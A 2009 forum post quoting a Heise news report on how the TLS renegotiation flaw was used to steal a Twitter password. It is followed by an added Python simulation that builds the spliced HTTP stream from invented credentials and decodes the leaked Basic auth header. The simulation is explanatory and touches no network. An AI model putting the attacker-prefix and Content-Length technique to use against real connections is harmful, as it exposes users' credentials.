Peaches Posted November 17, 2009

16 November 2009, 12:57

Password theft via vulnerability in SSL/TLS protocol

The vulnerability in the design of the SSL/TLS protocol revealed earlier this month can apparently be used to carry out attacks in practice. On his blog, student Anil Kurmus reports that he was able to steal a Twitter password by using a man-in-the-middle attack. Until now it had been assumed that the problem was largely theoretical and would be made manifest only in very limited scenarios.

The design weakness can be exploited by attackers to inject content into secure connections. In his attack, Kurmus appended a test victim's encrypted HTTPS request to his own Twitter request, effectively as a tweet. This does not allow the content of the packet to be viewed directly, but following decryption, the web server combines the two packets into one as a result of the TLS renegotiation vulnerability. In Kurmus' test, this resulted in the victim's HTTP request appearing as a tweet on Kurmus' Twitter account, with the victim's user name and password visible in easily decoded Base64-encoded form.

Full story at Heise Security - http://www.h-online....col-860435.html
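The splice the article describes happens below the application: a vulnerable server's TLS stack decrypts the attacker's pre-renegotiation bytes and the victim's post-renegotiation bytes and hands the web application one continuous stream. The following Python script is an added example, not code from the article, from Kurmus' blog or from Twitter. It does no TLS at all; it constructs that spliced plaintext stream from two made-up HTTP requests (a "mallory" account and a victim "alice" with password "hunter2", both invented here), parses it the way a simple HTTP server would, and shows why the victim's Authorization header ends up inside the attacker's tweet and decodes to the password. The path /statuses/update.xml and the "status" form field follow the Twitter API of that era; the victim's request, the credentials and the declared Content-Length are assumptions chosen for the demonstration.

```python
"""Application-layer simulation of the 2009 TLS renegotiation splice
(CVE-2009-3555) as used against Twitter. Added example; touches no TLS.

A vulnerable server passes the web application one byte stream:
attacker bytes sent before renegotiation, then the victim's bytes.
"""
import base64
import re
from urllib.parse import parse_qsl

CRLF = b"\r\n"


def basic_auth(user, password):
    """Value of an HTTP Basic Authorization header (Base64 of user:password)."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def build_request(method, path, headers, body=b""):
    """Serialise an HTTP/1.1 request; `headers` is a list of (name, value)."""
    lines = [f"{method} {path} HTTP/1.1".encode()]
    lines += [f"{k}: {v}".encode() for k, v in headers]
    return CRLF.join(lines) + CRLF + CRLF + body


def attacker_prefix(declared_length):
    """Attacker's own tweet request, sent before triggering renegotiation.

    The body is deliberately incomplete: only 'status=' is transmitted, while
    Content-Length promises more bytes. Whatever the victim sends next is
    consumed by the server as the rest of this body, i.e. as the tweet text.
    (Constructed attacker credentials.)
    """
    return build_request("POST", "/statuses/update.xml", [
        ("Host", "twitter.com"),
        ("Authorization", basic_auth("mallory", "attacker-pass")),
        ("Content-Type", "application/x-www-form-urlencoded"),
        ("Content-Length", str(declared_length)),
    ], b"status=")


def victim_request():
    """Constructed victim request: an API call authenticated with Basic auth."""
    return build_request("GET", "/statuses/home_timeline.xml", [
        ("Host", "twitter.com"),
        ("Authorization", basic_auth("alice", "hunter2")),
        ("User-Agent", "constructed-sample-client/1.0"),
    ])


def spliced_stream(declared_length):
    """What the application sees after the server's TLS layer has decrypted
    both sessions and joined them: attacker bytes, then victim bytes."""
    return attacker_prefix(declared_length) + victim_request()


def server_parse_first_request(stream):
    """Parse one request like a simple server: request line, headers, then
    exactly Content-Length body bytes. Returns (request_line, headers, body)."""
    head, _, rest = stream.partition(CRLF + CRLF)
    request_line, *header_lines = head.split(CRLF)
    headers = {}
    for line in header_lines:
        name, _, value = line.decode().partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    return request_line.decode(), headers, rest[:length]


def tweet_posted_by_server(declared_length):
    """The 'status' form field the application stores, i.e. the tweet text.

    parse_qsl splits on the first '=' only, so the '=' padding inside the
    victim's Base64 token survives; a '+' in the token would become a space.
    """
    _, _, body = server_parse_first_request(spliced_stream(declared_length))
    params = dict(parse_qsl(body.decode("latin-1"), keep_blank_values=True))
    return params["status"]


def credentials_from_tweet(tweet):
    """Recover user:password from a leaked Basic Authorization header."""
    m = re.search(r"Authorization: Basic ([A-Za-z0-9+/=]+)", tweet)
    if m is None:
        return None
    return base64.b64decode(m.group(1)).decode()


if __name__ == "__main__":
    # 140-character tweet limit plus the 7 bytes of 'status=' already sent.
    tweet = tweet_posted_by_server(7 + 140)
    print(repr(tweet))
    print("leaked credentials:", credentials_from_tweet(tweet))
```

The declared Content-Length is the attacker's only knob: it must be large enough that the victim's request line and Authorization header fall inside the body, and in the real attack it also had to fit whatever the server would accept as a tweet. Bytes of the victim's request beyond that length are parsed by the server as the start of a further request, which is why the victim sees an error rather than a normal response.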